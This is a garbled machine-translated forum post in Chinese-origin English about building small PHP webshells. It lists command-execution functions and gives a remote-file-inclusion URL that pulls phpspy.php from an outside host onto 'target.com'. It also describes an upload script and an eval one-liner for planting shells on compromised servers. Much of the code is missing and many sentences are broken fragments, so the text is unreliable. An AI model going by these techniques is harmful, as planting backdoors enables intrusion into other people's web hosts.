2. Tech
  3. Discussion on micro PHP Trojan

Discussion on micro PHP Trojan

xiaoxiao2021-03-06  18

There is nothing special in this article, just seeking bricks. And give a friend of the PHP door with me. Just a few days, I am eager to work, so I have to actively point out the mistakes and deficiencies. PHP syntax is powerful as ASP, only one: You can sprite the whole

service

The configuration of the device. Running CMD, uploading files, etc., is very easy, now use good PHP

Tip

Mo is the PHPSPY of Angel. Yesterday Hak

_

How to ask for PHP

Tip

Encryption, I haven't thought about it, but I write a miniature PHP.

Tip

I think it is difficult to kill. Here is a brief explore a few functions

Tip

Use: 1. Several functions that can run external commands: System, Passthru, EXEC, Shell

_

Exec, Popen. Example: As long as you save And the like as cmd.php and the function of running external commands. These functions can be said to be the earliest micro-line PHP

Tip

Therefore, the setting of the general virtual host will also block these functions. 2. Remember WDB

forum

STYLE.PHP

Vulnerability

? We can use this to be a small small

Tip

. As shown in: Save it as 1.PHP, we can call other non-supported PHP

service

.Php in .php

Tip

(Such as phpspy.php) to achieve our goal:

http://target.com/1.php

? Include = http://www.918x.com/phpspy.php Here

http://www.918x.com

Is there a PHP, otherwise it will be

http://www.918x.com

This station

service

Run phpspy.php instead of the target

service

. 3. This is still angel in Discuz 2.2F

attack

A very good upload to us

Tip

I didn't change:

_

FILES [MyFile] [TMP

_

Name], $

_

Files [myfile]);> After saving it as Up.php, submit forms in the local submission form:

can put the big PHP

Tip

Upload it up. 4. I have been thinking about the ASP of the ice courier.

Tip

PHP submitted by the local form

Tip

. Finally found the function: Eval, in the PHP4 Chinese Reference Manual: Syntax: Void Eval (String Code

_

STR); Content Description: This function can be revenue in the string, usually in processing

database

Information on the information. Parameter code

_

STR is a string to handle. The value of the value is that the string to be processed should comply with the PHP string format, and there must be a number at the end. The string after using this function will end along the end of the PHP program. We can save on the target host: For a PHP file (I want to plug in any file in PHP). Then through the local submission to achieve the purpose, but different from the ASP is that in MAGIC_

Quotes

_

When GPC = ON, a lot of characters are filtered, so that this function is greatly reduced. For this PHP

Tip

I have done many times, I have not matured many times.

Code

. Please advise. Will you give you. But Eval This function can do miniature PHP

Tip

It is not necessary to question. PS: After writing, someone tells me that in fact, the master has a miniature PHP.

Tip

It's just not open. Oh, I am so depressed,

the study

It is the result of people who have long since. Anyway, share my with you.

the study

I hope to get help and advice.

转载请注明原文地址:https://www.9cbs.com/read-41835.html

9cbs

New Post(0)